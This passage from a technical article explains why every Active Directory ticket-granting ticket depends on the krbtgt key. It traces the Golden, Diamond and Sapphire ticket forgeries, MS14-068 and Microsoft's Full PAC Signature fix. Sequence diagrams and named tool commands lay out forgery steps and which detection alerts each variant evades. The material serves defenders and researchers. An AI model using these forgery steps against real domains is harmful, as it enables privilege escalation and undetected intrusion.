&lt;li&gt;&lt;p&gt;&lt;strong&gt;The PAC server signature.&lt;/strong&gt; A keyed HMAC computed under the &lt;em&gt;service&lt;/em&gt; key. For a TGT the service is &lt;code&gt;krbtgt/DOMAIN&lt;/code&gt;, so the server signature is computed under the krbtgt long-term key. For a service ticket the server signature is computed under the service account&apos;s long-term key (the file server&apos;s machine-account key, for example) [@mspac].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The PAC KDC signature.&lt;/strong&gt; A keyed HMAC computed under the krbtgt long-term key, signing the bytes of the server signature. This is the pre-2022 anchor of PAC integrity: even if a service holding only its own key could verify the server signature, only the KDC (or anyone holding the krbtgt key) could compute the matching KDC signature. The &quot;pre-2022&quot; framing tracks the deployment of KB5020805&apos;s Full PAC Signature, documented in §5 Generation 6 [@kb5020805].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The Full PAC Signature.&lt;/strong&gt; Added by Microsoft&apos;s response to CVE-2022-37967, deployed via KB5020805 starting November 8, 2022 and enforced by default since July 11, 2023 [@kb5020805][@cve-2022-37967]. Computed by the KDC over the &lt;em&gt;entire&lt;/em&gt; PAC -- including the older two signatures -- and stored alongside them. Also computed under the krbtgt long-term key.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;

flowchart TD
    PAC[PAC contents: SIDs, groups, restrictions] --&amp;gt; SSig[Server Signature]
    PAC --&amp;gt; KSig[KDC Signature]
    PAC --&amp;gt; FSig[Full PAC Signature]
    SSig --&amp;gt; KEY[&quot;krbtgt long-term key (TGT)&quot;]
    KSig --&amp;gt; KEY
    FSig --&amp;gt; KEY
    KEY --&amp;gt; TGT[EncTicketPart for TGT]
    TGT --&amp;gt; WIRE[AS-REP / TGS-REP on the wire]
&lt;p&gt;This is the architectural fact the rest of the article will refer back to. The addition of the Full PAC Signature did not relocate the trust to a different key. All three PAC signatures on a TGT terminate at the krbtgt long-term key. An attacker who holds the krbtgt key computes all three correctly in the same step. This is the precise technical observation that motivates the Section 5 attack cascade and the Section 7 rotation analysis.&lt;/p&gt;
&lt;h3&gt;The enctype matrix&lt;/h3&gt;
&lt;p&gt;The krbtgt account does not hold a single key; it holds a set of keys, one per Kerberos encryption type advertised in &lt;code&gt;msDS-SupportedEncryptionTypes&lt;/code&gt; on the account object. RFC 4120 §5.2.9 defines the enctype numbers; common Windows values are AES-256-CTS-HMAC-SHA1-96 (enctype 18), AES-128 (enctype 17), and the legacy RC4-HMAC (enctype 23) [@rfc4120]. AES-256 has been the recommended default for newly-provisioned krbtgt accounts since the Windows Server 2008 R2 / Windows Server 2012 functional levels, though early Windows Server 2008 deployments often required a krbtgt password reset to materialise the AES keys. The post-2017 AES-SHA2 family (enctypes 19 and 20) is defined by IETF but not deployed in mainline Windows production as of [MS-KILE] revision 47.0 dated April 27, 2026 [@mskile].&lt;/p&gt;

A numeric identifier for the cryptographic algorithm and key length used to encrypt a Kerberos message. RFC 4120 §5.2.9 carries the `etype` field; the numbers themselves are assigned in RFC 3961/3962/4757 and the IANA Kerberos registry. Common Windows values are 17 (AES-128), 18 (AES-256), and 23 (the legacy RC4-HMAC). Each principal&apos;s long-term key is derived per enctype, so the krbtgt account stores multiple key derivations side by side [@rfc4120].
&lt;p&gt;Each derivation is stored in both &lt;em&gt;current&lt;/em&gt; and &lt;em&gt;previous&lt;/em&gt; slots; rotating the krbtgt password rederives the entire set for the new password and shifts the previous derivations into the previous slot.&lt;/p&gt;
&lt;h3&gt;FAST armoring sits next to, not above, the krbtgt key&lt;/h3&gt;
&lt;p&gt;RFC 6113 / [MS-KILE] Flexible Authentication Secure Tunneling adds a second key layer for the client-facing pre-authentication exchange, armoring the AS-REQ under a separate channel key derived from a TGT the client already holds. FAST hardens pre-authentication against offline brute-force. It does not change the fact that the TGT&apos;s &lt;code&gt;enc-part&lt;/code&gt; is encrypted under the krbtgt key on its way back to the client [@mskile]. No Kerberos extension shipped through 2026 moves the TGT&apos;s trust anchor anywhere other than the krbtgt long-term key.&lt;/p&gt;

Within a Kerberos domain, every TGT reduces to the same key, and that key has a name: krbtgt.
&lt;p&gt;That sentence is the load-bearing claim the rest of the article rests on. The next section explains how a 1988 academic design decision became the cryptographic foundation of every Windows domain alive today.&lt;/p&gt;
&lt;p&gt;{`
// Simplified model of the three PAC signatures on a TGT.
// Each signature is a keyed HMAC computed under the krbtgt long-term key.
const pacContents = &quot;SIDs, groups, restrictions&quot;;
const krbtgtKey = &quot;&amp;lt;32-byte AES-256 long-term key&amp;gt;&quot;;&lt;/p&gt;
&lt;p&gt;function hmac(key, data) {
  return key === krbtgtKey
    ? &quot;SIG(&quot; + data + &quot;)&quot;           // attacker-with-key computes valid sigs
    : &quot;INVALID&quot;;                    // attacker-without-key cannot forge them
}&lt;/p&gt;
&lt;p&gt;function buildPACBlock(attackerKey) {
  const serverSig = hmac(attackerKey, pacContents);
  const kdcSig    = hmac(attackerKey, serverSig);
  const fullPAC   = hmac(attackerKey, pacContents + serverSig + kdcSig);
  const validates = [serverSig, kdcSig, fullPAC].every(s =&amp;gt; s !== &quot;INVALID&quot;);
  return { serverSig, kdcSig, fullPAC, validates };
}&lt;/p&gt;
&lt;p&gt;console.log(&quot;with krbtgt key   :&quot;, buildPACBlock(krbtgtKey).validates);
console.log(&quot;without krbtgt key:&quot;, buildPACBlock(&quot;guess-key&quot;).validates);
`}&lt;/p&gt;
&lt;h2&gt;4. Origins: 1988 Athena, RFC 4120, [MS-KILE]&lt;/h2&gt;
&lt;p&gt;Open the bibliography of RFC 4120 and find an entry tagged &lt;code&gt;[Ste88]&lt;/code&gt;: &quot;Steiner, J., Neuman, C., and J. Schiller, &apos;Kerberos: An Authentication Service for Open Network Systems,&apos; USENIX Conference Proceedings, February 1988&quot; [@rfc4120]. The principal name &lt;code&gt;krbtgt&lt;/code&gt; is in that paper. It has been carried forward unchanged through RFC 1510 (1993) [@rfc1510], through Active Directory&apos;s February 2000 release, through RFC 4120 (2005) [@rfc4120], through the first [MS-KILE] revision (2007), and into the current [MS-KILE] revision 47.0 dated April 27, 2026 [@mskile]. Thirty-eight years.&lt;/p&gt;
&lt;p&gt;What did the 1988 design decision look like, and what has changed about its security properties since?&lt;/p&gt;
&lt;h3&gt;MIT Project Athena, 1983-1991&lt;/h3&gt;
&lt;p&gt;Project Athena ran at MIT from 1983 to 1991 as a campus-scale distributed-computing experiment funded primarily by IBM and DEC [@project-athena]. The authentication problem Athena needed to solve was the one every multi-user network has needed to solve since: how do you let thousands of workstations talk to thousands of services without broadcasting cleartext passwords on every connection? Steiner, Neuman, and Schiller presented their answer at the Winter USENIX conference in Dallas in February 1988. Their design introduced the &lt;code&gt;krbtgt&lt;/code&gt; principal name and the trust property that one key encrypts every TGT in the Kerberos domain [@athena1988].&lt;/p&gt;
&lt;p&gt;The principal name &lt;code&gt;krbtgt&lt;/code&gt; predates Active Directory by twelve years. MIT&apos;s 1988 USENIX paper used the name, RFC 1510 standardised it in 1993 [@rfc1510], and Windows 2000 inherited it unchanged. There is no Microsoft-specific Kerberos principal naming convention; the convention is IETF.&lt;/p&gt;
&lt;p&gt;The design property that one key encrypts every TGT was not framed in 1988 as a security risk. It was framed as a &lt;em&gt;simplification&lt;/em&gt;: by giving the TGS one stable identity that issues every TGT, the protocol does not need to negotiate per-session KDC identities or per-server validation paths. The protocol reduces, mathematically, to two questions: did the KDC issue this TGT, and did the TGT permit the subsequent TGS-REQ for this service? Both reduce to &quot;does this signature validate under the krbtgt key?&quot;&lt;/p&gt;
&lt;h3&gt;From RFC 1510 to [MS-KILE]&lt;/h3&gt;
&lt;p&gt;John Kohl and Clifford Neuman published RFC 1510 in September 1993, standardising Kerberos version 5 [@rfc1510]. The &lt;code&gt;krbtgt/DOMAIN@DOMAIN&lt;/code&gt; principal-name convention carried forward unchanged from Athena. RFC 1510 is the document Microsoft engineers read when they chose Kerberos v5 as the Windows 2000 default authentication protocol; the krbtgt account became part of the AD schema at the Windows 2000 ship date (RTM December 15, 1999; general availability February 17, 2000) [@windows-2000]. The Microsoft Learn default-accounts page binds the two specifications to the same account: &quot;KRBTGT is also the security principal name used by the KDC for a Windows Server domain, as specified by RFC 4120&quot; [@ms-default-accounts].&lt;/p&gt;
&lt;p&gt;RFC 4120, published in July 2005 by Neuman, Yu, Hartman, and Raeburn, obsoleted RFC 1510 [@rfc4120]. The principal name carried forward unchanged again. Section 5.3 defines the wire format of a ticket; §6.2 defines the principal-name convention. Microsoft Open Specifications then published the first [MS-KILE] revision in March 2007, documenting the Windows wire profile on top of RFC 4120. The current revision -- 47.0, dated April 27, 2026 -- still says the same thing: the krbtgt long-term key encrypts every TGT [@mskile]. The Microsoft overlay on top of the IETF specification is the AD-account-management surface: RID 502 fixed, password system-generated, password-history-of-2, disabled-for-interactive-logon, automatic provisioning at first-DC promotion [@ms-default-accounts][@ms-forest-recovery].&lt;/p&gt;
&lt;p&gt;Every Kerberos domain on the public Internet today has a &lt;code&gt;krbtgt&lt;/code&gt; principal in it. The name has not moved in thirty-eight years. Only the AD-specific overlay is what gives this article its Windows-specific subject; the protocol substrate is older than the attack surface by twenty-six years.&lt;/p&gt;
&lt;p&gt;The principal name and the trust property are nearly forty years old. The exploit chain that targets them is twelve. The interesting question is what happened in the twelve years that turned an academic design decision into the most consequential single key in enterprise computing. That story has a beginning at Black Hat USA on August 7, 2014.&lt;/p&gt;
&lt;h2&gt;5. The Attack Cascade, 2014 to 2024&lt;/h2&gt;
&lt;p&gt;Six generations of attack span ten years. None of them found a way to forge a TGT &lt;em&gt;without&lt;/em&gt; the krbtgt key; the search space is mathematically closed in that direction. What they did instead is get progressively better at hiding the forgery inside genuine-looking wire traffic. By 2022, the forgery and the legitimate TGT are wire-indistinguishable. Here is how that arc unfolded.&lt;/p&gt;

gantt
    title Attack and defence generations
    dateFormat YYYY-MM-DD
    axisFormat %Y
    section Attack
    Gen 0 Academic baseline       :done, g0, 2000-02-01, 2014-08-05
    Gen 1 MS14-068 PAC forgery    :crit, g1, 2014-11-18, 90d
    Gen 2 Golden Ticket           :crit, g2, 2014-08-07, 2920d
    Gen 3 Silver Ticket           :       g3, 2015-01-01, 4000d
    Gen 4 Diamond Ticket          :crit, g4, 2022-06-21, 1700d
    Gen 5 Sapphire Ticket         :crit, g5, 2022-10-15, 1300d
    section Defence
    MS14-068 patch                :done, d1, 2014-11-18, 30d
    MDI alert family              :done, d2, 2016-01-01, 800d
    Full PAC Signature audit      :done, d3, 2022-12-13, 210d
    Full PAC Signature enforce    :done, d4, 2023-07-11, 90d
    Compatibility removed         :done, d5, 2023-10-10, 30d
&lt;h3&gt;Generation 0 (pre-November 2014): the academic baseline&lt;/h3&gt;
&lt;p&gt;Two assumptions held for fourteen years between Windows 2000 RTM and Black Hat USA 2014. First, the PAC&apos;s two signatures -- the Server Signature and the KDC Signature -- were treated as adequate; the [MS-PAC] specification required the KDC Signature to be a keyed HMAC under the krbtgt key, but Windows KDCs in practice accepted weaker non-keyed checksums on it (CRC32, RSA-MD5) [@mspac][@ms14068]. Second, the long-term krbtgt key was held only on writeable DCs and was considered unreachable to remote attackers because no remote primitive existed to extract it. Both assumptions failed within months of each other. The MS14-068 disclosure broke the first; the productionised DCSync primitive in Mimikatz broke the second.&lt;/p&gt;
&lt;h3&gt;Generation 1 (November 18, 2014): MS14-068 and CVE-2014-6324&lt;/h3&gt;
&lt;p&gt;On November 18, 2014, Microsoft published security bulletin MS14-068, &quot;Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780)&quot; [@ms14068]. The disclosure: the KDC validated PACs using a checksum algorithm that did not actually depend on the krbtgt key. Any authenticated domain user could obtain a legitimate TGT, then submit a TGS-REQ carrying forged PAC authorization data that asserted Domain Admin group membership, and the vulnerable KDC would accept the forged checksum instead of enforcing the krbtgt-keyed PAC signature. The NVD entry for CVE-2014-6324 records that the bug &quot;allows remote authenticated domain users to obtain domain administrator privileges via a forged signature in a ticket, as exploited in the wild in November 2014, aka &apos;Kerberos Checksum Vulnerability&apos;&quot; [@cve-2014-6324]. CVSS 9.0. Critical for every supported Windows Server SKU. Exploited in the wild within hours of the bulletin.&lt;/p&gt;
&lt;p&gt;Discovery credit for MS14-068 appears across Metasploit module authorship, AttackerKB, and several practitioner write-ups as Tom Maddock. The MSRC bulletin verbatim says only &quot;privately reported&quot; and does not name the reporter publicly [@ms14068]. The Maddock attribution is folk knowledge; the MSRC primary does not confirm it.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s patch replaced the weak checksum with a real keyed HMAC under the krbtgt key, the same construction the [MS-PAC] document specifies today. The patch was correct: it restored PAC integrity to actual dependence on a real secret. It also, as a side-effect, elevated the krbtgt key from &quot;an important secret in the directory&quot; to &quot;the load-bearing secret of every authentication decision in the domain.&quot; From November 18, 2014 onward, an attacker who held the krbtgt key did not just hold a useful credential; the attacker held the &lt;em&gt;only&lt;/em&gt; credential the KDC could not check above.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The MS14-068 patch was correct -- it restored PAC integrity to dependence on the krbtgt key. Its side-effect was to elevate the krbtgt key from &quot;important&quot; to &quot;load-bearing for every authentication decision in the domain.&quot; From November 18, 2014 onward, the krbtgt key was the single secret worth attacking directly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Generation 2 (August 7, 2014): Golden Ticket&lt;/h3&gt;
&lt;p&gt;Skip Duckwall and Benjamin Delpy presented &quot;Abusing Microsoft Kerberos: Sorry you guys don&apos;t get it&quot; at Black Hat USA on August 7, 2014 [@infocondb-bh2014]. The technique they demonstrated is what Sean Metcalf later popularised as the Golden Ticket: with the krbtgt key in hand, an attacker forges a TGT from scratch for any principal SID with any group memberships [@adsec-1640]. The KDC validates the TGT by decrypting &lt;code&gt;enc-part&lt;/code&gt; with the krbtgt key. There is no upstream authority to check, because krbtgt &lt;em&gt;is&lt;/em&gt; the authority. MITRE T1558.001 codifies the technique [@mitre-t1558001]; Benjamin Delpy&apos;s Mimikatz &lt;code&gt;kerberos::golden&lt;/code&gt; command operationalises it [@mimikatz].&lt;/p&gt;

sequenceDiagram
    participant A as Attacker (holds krbtgt key)
    participant L as Local Kerberos cache
    participant K as KDC on a DC
    participant S as Target service
    A-&amp;gt;&amp;gt;A: Choose target SID and groups
    A-&amp;gt;&amp;gt;A: Build EncTicketPart locally
    A-&amp;gt;&amp;gt;A: HMAC PAC signatures under krbtgt key
    A-&amp;gt;&amp;gt;A: AES-encrypt enc-part under krbtgt key
    A-&amp;gt;&amp;gt;L: kerberos::ptt -- inject ticket
    L-&amp;gt;&amp;gt;K: TGS-REQ presenting forged TGT
    K-&amp;gt;&amp;gt;K: Decrypt TGT with krbtgt key -- valid
    K-&amp;gt;&amp;gt;L: TGS-REP for target service
    L-&amp;gt;&amp;gt;S: Present service ticket -- access granted
&lt;p&gt;The Golden Ticket works because of the single-key trust property the 1988 design chose. There is nothing in the protocol that asks &quot;is this TGT in the KDC&apos;s issuance log?&quot; The TGT is self-verifying. If it decrypts and its signatures validate under the key, it is, by definition, a TGT.&lt;/p&gt;
&lt;p&gt;Why, then, does Golden Ticket sometimes get caught? Because the default Mimikatz invocation leaves four observable artefacts that Microsoft Defender for Identity ships dedicated alerts for, under the umbrella of the Suspected-Golden-Ticket alert family [@mdi-classic][@mdi-credential]. Mimikatz historically defaulted to RC4-HMAC encryption (enctype 23), which is anomalous on a modern AD where AES is standard. Mimikatz historically defaulted to a ten-year ticket lifetime, against the AD &lt;code&gt;MaxTicketAge&lt;/code&gt; default of ten hours. The attacker frequently asserts groups the user does not actually hold, which produces a &quot;forged authorization data&quot; anomaly. And the attacker sometimes forges a ticket for an account that does not exist in the directory at all, which produces a &quot;nonexistent account&quot; anomaly. Microsoft&apos;s live MDI alerts page enumerates six External IDs in the family: 2009 (encryption downgrade), 2013 (forged authorization data), 2022 (time anomaly), 2027 (nonexistent account), 2032 (ticket anomaly), and 2040 (ticket anomaly using RBCD) [@mdi-classic].&lt;/p&gt;
&lt;p&gt;The structural observation: every alert in this family detects &lt;em&gt;symptoms of forging from scratch&lt;/em&gt;. None of them detects the primitive of &lt;em&gt;holding the krbtgt key&lt;/em&gt;. That distinction is what makes Generation 4 (Diamond) and Generation 5 (Sapphire) interesting.&lt;/p&gt;
&lt;h3&gt;Generation 3 (parallel path): Silver Ticket&lt;/h3&gt;
&lt;p&gt;Silver Tickets forge a &lt;em&gt;service ticket&lt;/em&gt; (TGS) under a captured service-account key. They sidestep the krbtgt key entirely; the KDC is never involved in the forgery, and the forgery validates only against the one service whose key was captured. MITRE T1558.002 catalogues the technique [@mitre-t1558002]. Mentioned here so the question stops being asked. Silver Tickets are a sibling technique that targets a different trust root (per-service account keys), not the krbtgt key.&lt;/p&gt;
&lt;h3&gt;Generation 4 (June 2022): Diamond Ticket&lt;/h3&gt;
&lt;p&gt;In June 2022, Andrew Schwartz at TrustedSec and Charlie Clark at Semperis co-published &quot;A Diamond in the Ruff,&quot; documenting a refinement of Golden Ticket that defeats every PAC-content anomaly detection in one stroke [@trustedsec-diamond][@semperis-diamond]. The technique: instead of forging the TGT from scratch, the attacker requests a &lt;em&gt;real&lt;/em&gt; TGT from the KDC, then decrypts its &lt;code&gt;enc-part&lt;/code&gt; using the held krbtgt key, modifies the PAC contents, re-signs the PAC under the krbtgt key, re-encrypts the &lt;code&gt;enc-part&lt;/code&gt;, and walks away with a ticket whose every wire property -- &lt;code&gt;sname&lt;/code&gt;, &lt;code&gt;cname&lt;/code&gt;, &lt;code&gt;authtime&lt;/code&gt; skew matching the real KDC&apos;s clock, plausible &lt;code&gt;endtime&lt;/code&gt;, AES-256 envelope -- looks like a legitimate KDC-issued artefact.&lt;/p&gt;

sequenceDiagram
    participant A as Attacker (low-priv user, holds krbtgt key)
    participant K as KDC on a DC
    participant L as Local Kerberos cache
    participant S as Target service
    A-&amp;gt;&amp;gt;K: AS-REQ for low-priv user
    K-&amp;gt;&amp;gt;A: Real TGT, encrypted under krbtgt key
    A-&amp;gt;&amp;gt;A: Decrypt enc-part with held krbtgt key
    A-&amp;gt;&amp;gt;A: Modify PAC SIDs to Domain Admins
    A-&amp;gt;&amp;gt;A: Recompute PAC signatures under krbtgt key
    A-&amp;gt;&amp;gt;A: Re-encrypt enc-part under krbtgt key
    A-&amp;gt;&amp;gt;L: ptt -- inject modified TGT
    L-&amp;gt;&amp;gt;K: TGS-REQ presenting Diamond TGT
    K-&amp;gt;&amp;gt;K: Decrypt -- valid, signatures match
    K-&amp;gt;&amp;gt;L: TGS-REP for target service
    L-&amp;gt;&amp;gt;S: Access granted as Domain Admin
&lt;p&gt;Every MDI Suspected-Golden-Ticket detection disappears, by construction. The encryption type is AES-256 because the KDC issued it that way. The lifetime matches the AD policy because the KDC set it that way. The cname matches a real account because the attacker requested the TGT as a real low-privilege account they own. The only thing the attacker changed is the group SIDs inside the PAC, and the PAC signatures revalidate because the attacker recomputed them under the same krbtgt key the KDC would have used.&lt;/p&gt;
&lt;p&gt;TrustedSec verbatim: Diamond &quot;would almost certainly require access to the AES256 key&quot; [@trustedsec-diamond]. The KDC issued the real TGT in AES-256 (the modern default), so the attacker needs the matching krbtgt AES key to decrypt and re-encrypt -- not just the RC4 NTLM hash that the classic Golden Ticket can use.&lt;/p&gt;
&lt;p&gt;The Diamond Ticket disclosure pointed at an architectural problem: with the krbtgt key in hand, every PAC-content anomaly detection is defeated. Microsoft&apos;s structural answer was the Full PAC Signature in November 2022. We come to that in Generation 6.&lt;/p&gt;
&lt;h3&gt;Generation 5 (October 2022): Sapphire Ticket&lt;/h3&gt;
&lt;p&gt;Charlie Bromberg, who publishes under the handle Shutdown (&lt;code&gt;@_nwodtuhs&lt;/code&gt;) at Synacktiv and maintains The Hacker Recipes wiki, disclosed Sapphire Ticket in October 2022 [@hackrecipes-sapphire][@shutdownrepo-sapphire]. Where Diamond modifies the PAC, Sapphire &lt;em&gt;splices&lt;/em&gt; the PAC. The procedure abuses two Kerberos extensions in combination -- Service-for-User-to-Self (S4U2self) and User-to-User (U2U) -- to coerce the KDC into issuing a service ticket whose embedded PAC describes a target user the attacker wishes to impersonate. The attacker then extracts that genuine PAC from the service ticket and embeds it, unchanged, in a freshly constructed TGT signed under the held krbtgt key.&lt;/p&gt;

A Kerberos extension that lets a service request a ticket *to itself*, on behalf of another user, without that user presenting credentials. Originally designed for protocol-transition scenarios (a web service accepting forms-based auth and translating it to Kerberos for downstream calls). Defined in [MS-SFU] (Kerberos Protocol Extensions: Service for User and Constrained Delegation Protocol); referenced from [MS-KILE] [@mssfu].

A Kerberos extension defined in RFC 4120 §3.7 that allows a ticket to be encrypted under the recipient&apos;s session key rather than its long-term key, enabling two clients to authenticate to each other without either being a KDC-registered service [@rfc4120].

sequenceDiagram
    participant A as Attacker (low-priv user, holds krbtgt key)
    participant K as KDC on a DC
    participant L as Local Kerberos cache
    participant S as Target service
    A-&amp;gt;&amp;gt;K: AS-REQ for low-priv user
    K-&amp;gt;&amp;gt;A: Real attacker TGT
    A-&amp;gt;&amp;gt;K: S4U2self + U2U TGS-REQ for target user
    K-&amp;gt;&amp;gt;A: TGS containing target user&apos;s genuine PAC
    A-&amp;gt;&amp;gt;A: Extract genuine PAC from TGS
    A-&amp;gt;&amp;gt;A: Build new TGT, embed genuine PAC
    A-&amp;gt;&amp;gt;A: Sign three PAC signatures under krbtgt key
    A-&amp;gt;&amp;gt;A: Encrypt enc-part under krbtgt key
    A-&amp;gt;&amp;gt;L: ptt -- inject Sapphire TGT
    L-&amp;gt;&amp;gt;K: TGS-REQ presenting Sapphire TGT
    K-&amp;gt;&amp;gt;K: Decrypt -- valid, PAC is genuine
    K-&amp;gt;&amp;gt;L: TGS-REP for target service
    L-&amp;gt;&amp;gt;S: Access granted as target user
&lt;p&gt;By construction, there is no PAC-content anomaly to detect: the PAC inside the resulting TGT is literally a PAC the KDC issued for the target user, because the KDC &lt;em&gt;did&lt;/em&gt; issue it. The PAC&apos;s three signatures revalidate because the attacker held the krbtgt key to sign them; if Microsoft validates the Full PAC Signature on incoming tickets, that signature also validates because the attacker computed it under the same krbtgt key. Detection must move to traffic-flow analysis -- specifically, the anomalous S4U2self plus U2U TGS-REQ sequence on the wire -- and as of May 2026 no vendor has shipped a clean canonical default-enabled analytic for that signal [@unit42-gemstones].&lt;/p&gt;
&lt;p&gt;The Sapphire Ticket disclosure is widely misattributed to Charlie Clark (Semperis). The primary tooling artefact -- the Impacket PR #1411 conversation thread -- addresses the author as &lt;code&gt;@ShutdownRepo&lt;/code&gt;, who is Charlie Bromberg of Synacktiv [@impacket-1411]. The Hacker Recipes wiki and pgj11.com both confirm Bromberg as the author of record [@hackrecipes-sapphire][@pgj11]. The misattribution conflates Sapphire with Clark&apos;s separate &quot;AS Requested Service Tickets&quot; technique.&lt;/p&gt;
&lt;p&gt;The empirical artefact is the Impacket pull request #1411, in which Bromberg added the &lt;code&gt;-impersonate&lt;/code&gt; flag to &lt;code&gt;ticketer.py&lt;/code&gt; to put the tool into &quot;sapphire ticket mode&quot; [@impacket-1411][@shutdownrepo-sapphire]. Palo Alto Unit 42&apos;s &quot;Precious Gemstones&quot; survey is the vendor-side state-of-the-art summary [@unit42-gemstones].&lt;/p&gt;
&lt;h3&gt;Generation 6 (November 2022 to October 2023): KrbtgtFullPacSignature&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s formal response to the post-2014 attack arc shipped as KB5020805 starting November 8, 2022, addressing CVE-2022-37967 [@kb5020805][@cve-2022-37967]. The fix adds a new PAC signature -- the Full PAC Signature -- computed by the KDC over the &lt;em&gt;entire&lt;/em&gt; PAC including the older two signatures, validated on incoming tickets, and rolled out across five deployment phases:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Phase&lt;/th&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Mode&lt;/th&gt;
&lt;th&gt;&lt;code&gt;KrbtgtFullPacSignature&lt;/code&gt; value&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Initial Deployment&lt;/td&gt;
&lt;td&gt;November 8, 2022&lt;/td&gt;
&lt;td&gt;Signatures added, validation disabled&lt;/td&gt;
&lt;td&gt;1 (Compatibility)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Second Deployment&lt;/td&gt;
&lt;td&gt;December 13, 2022&lt;/td&gt;
&lt;td&gt;Audit mode default&lt;/td&gt;
&lt;td&gt;2 (Audit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Third Deployment&lt;/td&gt;
&lt;td&gt;June 13, 2023&lt;/td&gt;
&lt;td&gt;Cannot disable signature addition&lt;/td&gt;
&lt;td&gt;(value 0 removed)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default Enforcement&lt;/td&gt;
&lt;td&gt;July 11, 2023&lt;/td&gt;
&lt;td&gt;Enforcement default&lt;/td&gt;
&lt;td&gt;3 (Enforcement)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Removal of Compatibility&lt;/td&gt;
&lt;td&gt;October 10, 2023&lt;/td&gt;
&lt;td&gt;Audit removed, Enforcement permanent&lt;/td&gt;
&lt;td&gt;(registry key removed)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;KB5020805 documents the final state verbatim: &quot;Windows updates released on or after October 10, 2023 will do the following: Removes support for the registry subkey KrbtgtFullPacSignature. Removes support for Audit mode. All service tickets without the new PAC signatures will be denied authentication&quot; [@kb5020805].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The KB number for KrbtgtFullPacSignature is KB5020805, not KB5021131. KB5021131 is the paired but distinct KB for CVE-2022-37966 (encryption-type enforcement). The PAC-signature-specific KB is KB5020805. Secondary sources routinely confuse the two.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here is the structural fact. The Full PAC Signature is &lt;em&gt;also&lt;/em&gt; computed under the krbtgt key. So an attacker who holds the krbtgt key still mints fully-validating tickets, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sapphire Tickets, which never modify the PAC at all; the existing signatures the KDC issued are valid by construction, the Full PAC Signature included.&lt;/li&gt;
&lt;li&gt;Recomputed Diamond Tickets, in which the attacker simply computes the Full PAC Signature alongside the older KDC signature in the same step, because both depend on the same key the attacker holds.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;KrbtgtFullPacSignature retired one specific class of attack (Diamond Tickets that did not recompute the Full PAC Signature). It did not retire the underlying primitive (TGT forgery from a known krbtgt key). The PAC signature surface in Section 3 -- all three signatures terminating at the same key -- is exactly why this is so.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The Full PAC Signature was Microsoft&apos;s structural response to Diamond Ticket. It is itself computed under the krbtgt key. So an attacker who holds the krbtgt key recomputes it in the same step as the KDC signature -- and Sapphire Tickets, which never modify the PAC at all, are unaffected by construction. CVE-2022-37967 retired one class of attack (PAC-modifying Diamond variants); it did not retire the primitive.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Comparing the three forgery variants&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Golden&lt;/th&gt;
&lt;th&gt;Diamond&lt;/th&gt;
&lt;th&gt;Sapphire&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Requires krbtgt key?&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (enctype key, usu. AES-256)&lt;/td&gt;
&lt;td&gt;Yes (enctype key, usu. AES-256)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Calls the KDC?&lt;/td&gt;
&lt;td&gt;No (forges from scratch)&lt;/td&gt;
&lt;td&gt;Yes (real AS-REQ)&lt;/td&gt;
&lt;td&gt;Yes (AS-REQ + S4U2self+U2U)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Modifies the PAC?&lt;/td&gt;
&lt;td&gt;Builds it from scratch&lt;/td&gt;
&lt;td&gt;Yes (group SIDs)&lt;/td&gt;
&lt;td&gt;No (genuine PAC)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defeats MDI encryption downgrade alert?&lt;/td&gt;
&lt;td&gt;No (defaults RC4)&lt;/td&gt;
&lt;td&gt;Yes (real AES)&lt;/td&gt;
&lt;td&gt;Yes (real AES)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defeats MDI time-anomaly alert?&lt;/td&gt;
&lt;td&gt;No (defaults 10y)&lt;/td&gt;
&lt;td&gt;Yes (KDC lifetime)&lt;/td&gt;
&lt;td&gt;Yes (KDC lifetime)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defeats MDI forged-auth-data alert?&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (still triggers if group mismatch detected via other means)&lt;/td&gt;
&lt;td&gt;Yes (PAC is genuine)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defeats Full PAC Signature (post-July 2023)?&lt;/td&gt;
